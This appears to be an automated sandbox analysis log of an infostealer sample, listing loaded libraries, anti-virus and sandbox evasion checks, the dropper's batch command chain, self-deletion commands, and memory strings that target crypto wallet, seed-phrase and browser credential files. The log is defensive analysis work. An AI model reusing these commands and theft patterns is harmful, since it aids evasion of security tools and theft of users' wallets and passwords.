                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: GoldenContinent.exeStatic file information: File size 1122075 > 1048576
                Source: GoldenContinent.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: GoldenContinent.exeStatic PE information: real checksum: 0x11bd4e should be: 0x117ea2
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C10DE6 push ecx; ret 10_2_00C10DF9

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C826DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00C826DD
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C0FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00C0FC7C
                Source: C:\Users\user\Desktop\GoldenContinent.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_10-103440
                Source: Relationship.com, 0000000A.00000002.2594230702.00000000040F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comAPI coverage: 3.8 %
                Source: C:\Windows\SysWOW64\timeout.exe TID: 7900Thread sleep count: 85 > 30
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C5DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00C5DC54
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C6A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00C6A087
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C6A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00C6A1E2
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C5E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00C5E472
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C6A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00C6A570
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C666DC FindFirstFileW,FindNextFileW,FindClose,10_2_00C666DC
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C2C622 FindFirstFileExW,10_2_00C2C622
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00C673D4
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C67333 FindFirstFileW,FindClose,10_2_00C67333
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C5D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00C5D921
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00BF5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00BF5FC8
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\523266\
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\523266
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
                Source: Relationship.com, 0000000A.00000002.2594436163.0000000004190000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Relationship.com, 0000000A.00000002.2593745021.0000000001864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comProcess information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C6F4FF BlockInput,10_2_00C6F4FF
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00BF338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00BF338B
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C15058 mov eax, dword ptr fs:[00000030h]10_2_00C15058
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C520AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,10_2_00C520AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C22992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00C22992
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C10BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00C10BAF
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C10D45 SetUnhandledExceptionFilter,10_2_00C10D45
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C10F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00C10F91

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: Relationship.com PID: 7576, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C51B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00C51B4D
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00BF338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00BF338B
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C5BBED SendInput,keybd_event,10_2_00C5BBED
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C5ECD0 mouse_event,10_2_00C5ECD0
                Source: C:\Users\user\Desktop\GoldenContinent.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Jam Jam.cmd & Jam.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 523266
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "landing" Ca
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Existing + ..\Lower + ..\Wants + ..\Elvis + ..\Distribution x
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\523266\Relationship.com Relationship.com x
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\523266\Relationship.com" & rd /s /q "C:\ProgramData\8Y5XTR16XLN7" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C514AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_00C514AE
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C51FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00C51FB0
                Source: Relationship.com, 0000000A.00000000.1702606674.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp, Gnu.0.dr, Relationship.com.1.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Relationship.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C10A08 cpuid 10_2_00C10A08
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C4E5F4 GetLocalTime,10_2_00C4E5F4
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C4E652 GetUserNameW,10_2_00C4E652
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C2BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,10_2_00C2BCD2
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

                Stealing of Sensitive Information

                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 10.2.Relationship.com.43f0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2598479689.00000000043F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1986763504.00000000018A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1986800119.00000000043FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1986740506.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2594230702.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2593745021.0000000001864000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Relationship.com PID: 7576, type: MEMORYSTR
                Source: Relationship.com, 0000000A.00000002.2598479689.000000000459C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Exodus\
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: info.seco
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: seed.seco
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
